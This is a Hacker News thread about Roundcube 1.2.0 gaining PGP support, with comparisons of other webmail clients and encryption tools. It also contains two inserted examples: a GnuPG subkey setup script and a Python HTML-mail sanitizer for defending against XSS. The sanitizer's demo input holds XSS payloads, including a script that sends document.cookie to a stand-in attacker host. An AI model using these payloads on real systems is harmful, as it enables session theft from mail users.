
Roundcube Webmail 1.2.0 released with PGP support - weeha
https://roundcube.net/news/2016/05/22/roundcube-webmail-1.2.0-released
======
benbristow
Rainloop already has this.
[http://www.rainloop.net/](http://www.rainloop.net/)

Been using it for a year or so now, it's fantastic and has never let me down.

~~~
gravypod
I came here to comment about this. Rainloop is amazing.

It also has some extra security features for the end user. For instance, you
can tell Rainloop to proxy images from the email and serve them to you instead
of your browser getting them from a remote source. It's amazing because you
get faster load times and don't leak your desktop IP, only whatever server
you're running Rainloop on.

The only thing it's lacking is PGP, which is very sad.

~~~
unethical_ban
Wait, the parent said Rainloop has PGP. That's why they brought it up.

~~~
JohnTHaller
The features page states: "Client Side OpenPGP (JS)"

~~~
gravypod
It's not fully implemented from what I understand.

------
rmoriz
I wish someone would do this for S/MIME. S/MIME has native support in many
MUAs, even Mail.app on iOS. [http://smime.io/](http://smime.io/)

[https://github.com/roundcube/roundcubemail/issues/4977](https://github.com/roundcube/roundcubemail/issues/4977)

~~~
grinich
Is S/MIME really that widely used? It seems to be sort of widely deployed, but
not necessarily understood or required by users in secure environments.

~~~
rmoriz
Yes. And it's already supported in many clients without plugins, many
companies just sign their mails. You probably don't even notice that if you
don't know where to look. It's very unobtrusive compared to gpg.

------
embik
For everyone who (like me) wondered what happened to "Roundcube Next", they
released a statement 8 days ago[1] about it. Sounds like they had personal
problems getting in the way. Glad to see the project is still alive.

[1] [https://www.indiegogo.com/projects/roundcube-next--2#/update...](https://www.indiegogo.com/projects/roundcube-next--2#/updates)

~~~
teekert
Thanx for the update, I tweeted them repeatedly, never getting any reply. It
looks pretty bad that the last tweet is so old. In the meantime, I've been
using Nylas N1 (local mail client) and ownCloud mail (webmail), both have
become pretty good!

~~~
grinich
Thanks for the kind words! (I work at Nylas.)

We actually have PGP support coming soon as well. ;)

~~~
teekert
Oh, thanx for the product! One question, I just read here on HN that Nylas
stores certain data on Nylas servers. I actually thought it was just a local
mail client like Thunderbird (only better looking and more modern). It's not
very clear from the website what exactly happens to my mail and login
credentials, do you have some pointers?

~~~
grinich
Sure, here's a bit more info: [https://support.nylas.com/hc/en-us/articles/217518207-Why-do...](https://support.nylas.com/hc/en-us/articles/217518207-Why-does-Nylas-N1-sync-email-via-the-cloud-)

A bit more here: nylas.com/blog/nylas-pro

We've spent a lot of time on this and the setup screens pretty clearly say
this syncs your data to the cloud for performance and speed.

You can also write me directly if you have specific questions. Thanks!

------
Sephr
It's nice to hear about the server-side PGP support (searching!), although
it's unfortunate that the client-side solution, Mailvelope (or more
specifically, the OpenPGP.js library it uses), still doesn't support any ECC
algorithms.

Fortunately Google's End-to-End extension does support ECC algorithms (no idea
if it integrates with Roundcube though), but it seems like it still isn't
ready for production distribution on the Chrome Web Store yet.

~~~
mikekchar
I may be wrong (and hope to be corrected!), but I think that End-to-End is
never expected to be in the Chrome Web Store. I think they feel that this kind
of encryption is too complicated for the average user. It's intended more for
"power users" who already know that they want it.

~~~
SquareWheel
They've discouraged people from compiling builds and then uploading it to the
store, but I believe this is because they don't want a half-implemented/untested
PGP library posted -- especially one with their name on it.

I haven't seen any concrete plans about how they plan to distribute it when
it's done, but I didn't get the same sense about them not wanting to upload it
themselves. In fact, I think Google would be thrilled to push proper end-to-end
support in Gmail.

~~~
riprowan
Sorry if this is a dumb question, but if Gmail is e2e, how can Google harvest
user data from it?

~~~
SquareWheel
They couldn't. They would have to show ads from other history and not the
email's contents. This would also break features such as (server-side) search
and reminders (e.g. flight tomorrow) via Google Now.

End-to-end is a tradeoff. But presumably they wouldn't be working on the
technology if they weren't prepared to offer it in some fashion. Probably as
an opt-in? Hopefully a Googler can offer more insight as I can only speculate.

~~~
ryanl0l
>They couldn't. They would have to show ads from other history and not the
email's contents. This would also break features such as (server-side) search
and reminders (e.g. flight tomorrow) via Google Now.

Sure they could; all incoming emails aren't magically going to become e2e
encrypted.

~~~
SquareWheel
Well, no. But that's not really end-to-end, is it?

If the goal is to make E2E more accessible then eventually more emails will
come in encrypted. Maybe Google will let users with the extension find each
other, or Gmail might help coordinate that.

~~~
ryanl0l
Sure, but I'd imagine that most email traffic is automated non-sensitive stuff
(i.e. flight confirmations for example). That stuff is simply not going to be
e2e encrypted any time soon, if ever.

Are people going to start filling in their pubkeys when they book a flight?
What about when they're at the airport and need to pull up the record locator
on a different device?

I'm sure more emails will start being encrypted, but that'll mostly be
communications between people. Those probably aren't particularly interesting
to google anyway.

~~~
SquareWheel
I'd give it time. People won't enter their public keys when booking a flight,
but it might be associated with their email address automatically. I could see
Google running a service like Keybase. Or even integrating it further into
whatever the next hip "online identity" service is. Built in privacy would be
a huge boon.

The flight company (or email sender they use) could then request your public
key and send off your message. And with some common protocols and APIs the
complexity could be largely abstracted away.

I wouldn't underestimate the technology. When you look at more complex systems
like internet routing tables, these problems feel a lot more solvable. We
already have the technology for most of this. The problem right now is making
it accessible.

------
xvilka
I also recommend trying Mailpile [1], which was built with security in mind.

[1] [https://www.mailpile.is/](https://www.mailpile.is/)

~~~
bildung
As far as I understood Mailpile is a mail user agent, so not comparable.
Roundcube runs on a server, Mailpile runs on your own computer.

~~~
taneliv
"You can [then] access it over the network using your web browser"
[https://www.mailpile.is/faq/#wha-2](https://www.mailpile.is/faq/#wha-2) seems
to challenge your knowledge. I don't know if using it so compromises privacy
in unexpected ways, or indeed even works satisfactorily; I am not a user.

~~~
bildung
It now indeed seems to be the planned path to create a full webmail service
out of Mailpile. Though right now the developers still say it's "written as a
personal application":
[https://www.mailpile.is/faq/#tec-8](https://www.mailpile.is/faq/#tec-8)

------
CiPHPerCoder
[https://github.com/roundcube/roundcubemail/issues/5266](https://github.com/roundcube/roundcubemail/issues/5266)

Legacy PHP code (as old as 5.3.7) strikes again.

------
arviewer
I guess this means you have to upload your private key to the server. I always
wonder what happens when the key is copied and used by someone else. Can you
revoke the key? What happens to sent and received messages from the past? Do
you still need the old key (private or public) to read those? Is there a
private master key that can create a private sub key that can be used to
upload to that server?

~~~
elgaton
Encryption is also supported via a browser plugin, so it's not necessary to
upload the private key to the server. Regarding your questions: 1) yes, you
can revoke the key by generating a revocation certificate and publishing it on
a public keyserver (of course, your correspondents would need to refresh the
public key from the keyserver to know it was revoked, which is something they
might not do); 2) sent and received messages from the past, unfortunately, are
readable by the person who is in possession of the private key, if such key is
not protected by a strong password; 3) yes, you still need the old private key
to read the old messages; 4) you can generate a master key (to be kept
strictly offline) and several frequently rotated subkeys for encryption
purposes. It's not a silver bullet solution (in the sense that a thief would
still have access to all your subkeys, meaning he could read all your messages
up to the point the keys are stolen), but it mitigates the damage somewhat. See
here: [https://alexcabal.com/creating-the-perfect-gpg-keypair](https://alexcabal.com/creating-the-perfect-gpg-keypair)

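The master-key-plus-subkeys setup described in the comment above, as an added example that is not part of the original thread, of Roundcube, or of the linked guide. It assumes GnuPG 2.1 or newer is on PATH; the identity "Alice <alice@example.org>" is made up, the empty passphrase is only so it runs unattended, and the second keyring is a stand-in for the webmail server. It generates a certify-only primary key, adds one-year signing and encryption subkeys, checks that the revocation certificate GnuPG writes at generation time exists, exports the secret subkeys alone, and confirms that the keyring that receives them holds only a stub for the primary key:

```shell
#!/bin/sh
# Added example, not Roundcube's or the linked guide's script. Assumptions:
# GnuPG >= 2.1 on PATH; made-up identity; empty passphrase for unattended use only.
set -eu

# Unattended wrapper: batch mode, no pinentry, empty passphrase (demo only).
gpgb() { gpg --batch --quiet --pinentry-mode loopback --passphrase '' "$@"; }

# Builds the keys, exports secret subkeys only, imports them into a fresh keyring
# (the "server") and prints the availability field of the primary secret key there:
# "#" means the server holds only a stub and cannot certify or mint new subkeys.
demo_subkeys() {
    work=$(mktemp -d)
    export GNUPGHOME="$work/master"
    mkdir -m 700 "$GNUPGHOME"

    # Primary key with the certify capability only; it never needs to be online.
    gpgb --quick-generate-key "Alice <alice@example.org>" ed25519 cert never
    fpr=$(gpg --batch --with-colons --list-keys alice@example.org \
          | awk -F: '/^fpr/ { print $10; exit }')

    # One-year subkeys. Rotation means adding new ones and letting old ones expire;
    # keep the expired encryption subkeys, they are still needed to read old mail.
    gpgb --quick-add-key "$fpr" ed25519 sign 1y
    gpgb --quick-add-key "$fpr" cv25519 encr 1y

    # GnuPG 2.1+ writes a revocation certificate at generation time; keep it with
    # the offline master so the key can be revoked even if the master is lost.
    [ -s "$GNUPGHOME/openpgp-revocs.d/$fpr.rev" ]

    # Export the secret subkeys only; the primary secret key stays in this directory.
    gpgb --armor --export-secret-subkeys "$fpr" > "$work/subkeys.asc"

    # Stand-in for the webmail server's keyring.
    GNUPGHOME="$work/server"
    mkdir -m 700 "$GNUPGHOME"
    gpg --batch --quiet --import "$work/subkeys.asc" 2>/dev/null
    gpg --batch --with-colons --list-secret-keys "$fpr" \
        | awk -F: '/^sec/ { print $15; exit }'

    gpgconf --kill gpg-agent 2>/dev/null || true
    GNUPGHOME="$work/master" gpgconf --kill gpg-agent 2>/dev/null || true
    rm -rf "$work"
}

if [ "${1:-}" = "--run" ]; then
    demo_subkeys
fi
```

The field printed at the end comes from `--with-colons` output, where a `#` in field 15 of the `sec` record marks a secret key that is only a stub. A thief who copies the server keyring gets the subkeys and can read everything encrypted to them up to that point, exactly as the comment says; what they cannot do is issue new subkeys or extend expiry, so the offline master plus the revocation certificate is what lets you recover control.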
------
xrorre
Here's an old XSS exploit for Roundcube from 2013:

[https://www.intelligentexploit.com/view-details.html?id=1696...](https://www.intelligentexploit.com/view-details.html?id=16961)

I still use RC despite the long history of XSS attacks against it. Luckily RC
uses progressive enhancement, so it still works with JS turned off. I just
assume emails can still execute JS in 2016? Perhaps it's wrong of me to use RC
with JS turned off as a preventative measure, but you have to adore that user
interface! It's the only reason I choose RC over other self-hosted email web
apps (and there are few to choose from in this space). I like the simplicity
of SquirrelMail, but Roundcube looks and feels too good _not_ to use.

~~~
dguido
You're right. Before any integration of a server-side PGP key like this, they
ought to have deployed some basic hygiene like a strict Content Security
Policy (CSP) and a better sanitization library like HTML Purifier. I don't
trust webmail software, and definitely not PHP webmail software, to hold my
keys for me otherwise.

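The three defensive measures raised in this thread (gravypod's image proxy that keeps the reader's IP away from the sender, the XSS history xrorre mentions, and the sanitization plus strict CSP dguido asks for) fit together in one piece of code, shown here as an added example that is not Roundcube's, Rainloop's or any library's code. It assumes a proxy endpoint at /imgproxy on the webmail origin and a per-deployment HMAC key, both made up for the example; the sample message body is constructed. The sanitizer drops active content and inline event handlers, refuses non-http link schemes, and rewrites every remote image to a signed proxy URL; the proxy-side check refuses URLs it did not issue, which is what keeps the proxy from becoming an open proxy or SSRF primitive:

```python
import hashlib
import hmac
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumptions for this example (not Roundcube's or Rainloop's code or settings):
# the proxy endpoint lives at PROXY_PATH on the webmail origin, and PROXY_KEY is a
# per-deployment secret used to sign proxy URLs so the endpoint is not an open proxy.
PROXY_PATH = "/imgproxy"
PROXY_KEY = b"example-only-key-rotate-per-deployment"

DROP_TAGS = {"script", "style", "iframe", "frame", "object", "embed", "form",
             "link", "meta", "base", "svg", "math", "template"}
VOID_TAGS = {"img", "br", "hr", "input", "area", "col", "source", "wbr",
             "link", "meta", "base"}
URL_ATTRS = {"src", "href", "background", "poster", "action", "formaction"}
SAFE_LINK_SCHEMES = {"http", "https", "mailto", ""}   # "" = relative or fragment


def proxy_url(remote: str) -> str:
    """Rewrite a remote image URL into a proxy URL signed with HMAC-SHA256."""
    tag = hmac.new(PROXY_KEY, remote.encode(), hashlib.sha256).hexdigest()
    return PROXY_PATH + "?" + urlencode({"u": remote, "t": tag})


def parse_proxy_request(url: str):
    """Proxy side: return the remote URL to fetch, or None if signature or scheme is bad."""
    qs = parse_qs(urlsplit(url).query)
    remote = qs.get("u", [""])[0]
    tag = qs.get("t", [""])[0]
    expected = hmac.new(PROXY_KEY, remote.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None                        # not issued by the sanitizer, or tampered
    if urlsplit(remote).scheme.lower() not in ("http", "https"):
        return None                        # never fetch file:, gopher:, ...
    return remote


class MailSanitizer(HTMLParser):
    """Cleaner for HTML mail bodies: drops active elements with their content,
    strips event handlers and unsafe URL schemes, routes remote images via the proxy."""

    def __init__(self):
        super().__init__()
        self.out = []
        self.skip = 0   # nesting depth inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_TAGS:
            if tag not in VOID_TAGS:       # void elements (meta, link, base) have no end tag
                self.skip += 1
            return
        if self.skip:
            return
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on"):
                continue                   # onload=, onerror=, ...
            if name == "style" and ("url(" in value.lower() or "expression(" in value.lower()):
                continue                   # CSS-driven fetches / legacy IE script
            if name in URL_ATTRS:
                scheme = urlsplit(value).scheme.lower()
                if tag == "img" and name == "src":
                    if scheme in ("http", "https"):
                        value = proxy_url(value)   # browser never contacts the sender's host
                    elif scheme != "cid":
                        continue           # data:, javascript:, file:, ...
                elif scheme not in SAFE_LINK_SCHEMES:
                    continue
            kept.append((name, value))
        attr_text = "".join(f' {n}="{html.escape(v, quote=True)}"' for n, v in kept)
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag in DROP_TAGS:
            if tag not in VOID_TAGS:
                self.skip = max(0, self.skip - 1)
            return
        if self.skip or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))
    # Comments and declarations are dropped: HTMLParser's defaults emit nothing for them.


def sanitize(body: str) -> str:
    p = MailSanitizer()
    p.feed(body)
    p.close()
    return "".join(p.out)


def csp_header() -> str:
    """Strict CSP for the message-view document: no inline or remote script,
    images only from this origin (the proxy and inline attachments)."""
    return ("default-src 'none'; script-src 'self'; style-src 'self' 'unsafe-inline'; "
            "img-src 'self'; frame-ancestors 'none'; form-action 'none'")


# Constructed sample body for the demo: the usual suspects, not a real message.
SAMPLE = (
    '<p onmouseover="alert(1)">Hi <b>there</b></p>'
    '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    '<img src="http://tracker.example/pixel.gif?id=42" width="1" height="1">'
    '<div style="background:url(http://tracker.example/bg.png)">promo</div>'
    '<a href="javascript:alert(2)">click</a> <a href="https://good.example/">ok</a>'
)

if __name__ == "__main__":
    print(sanitize(SAMPLE))
    print(csp_header())
```

Two design points worth noting. The HMAC on the proxy URL is not optional: without it, `/imgproxy?u=http://10.0.0.5/` lets any mail recipient make the webmail server fetch internal hosts, so the proxy should also refuse private address ranges after DNS resolution, which this example does not show. And the CSP limits `img-src` to `'self'`, so even an image the sanitizer failed to rewrite cannot reach the sender's host; that is the defense-in-depth dguido is describing, and in a real deployment the sanitizer itself would be a maintained library such as HTML Purifier rather than a hand-rolled one like this.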
------
bechampion
Ha, I remember a long time ago chasing after the perfect webmail system... before
Gmail of course. Horde, Roundcube, Squirrel, god... I've never found the perfect
one!

~~~
ryanlol
How about OWA? Despite requiring windows, it's a pretty solid product.

~~~
jethro_tell
It doesn't require Windows. It's a web app... that is pretty rough.

~~~
ryanlol
I don't think you can run the web app on linux.

~~~
jethro_tell
Based on what?

I run the web app on my Linux box for Calendaring and sometimes email.

Most of the time I use mutt with imap for email. But I run the web app 40+
hours per week.

~~~
ryanlol
I am talking about hosting the application, of course you can interface with
the web app from whatever.

------
zby
If PGP was managed by the browser we would be able to sign everything we post
on the web, not just the emails.

~~~
lmm
There are extensions that do this. A standardized interface between site and
browser-managed crypto is what's really needed though.

------
mrmondo
I get the feeling we need a 'gogs of a webmail app'

------
BorisMelnik
Nice, I use Roundcube a lot for new clients looking to set up their email for
the first time. Glad to support this project, and really stoked it has PGP.

------
tiatia
Nice.

But I prefer Afterlogic
[http://www.afterlogic.com/](http://www.afterlogic.com/)

Wish it was open source/freeware

~~~
mrmondo
Hmmm... They give out an option of PHP or .NET, not sure I'd really like to
run either of those?

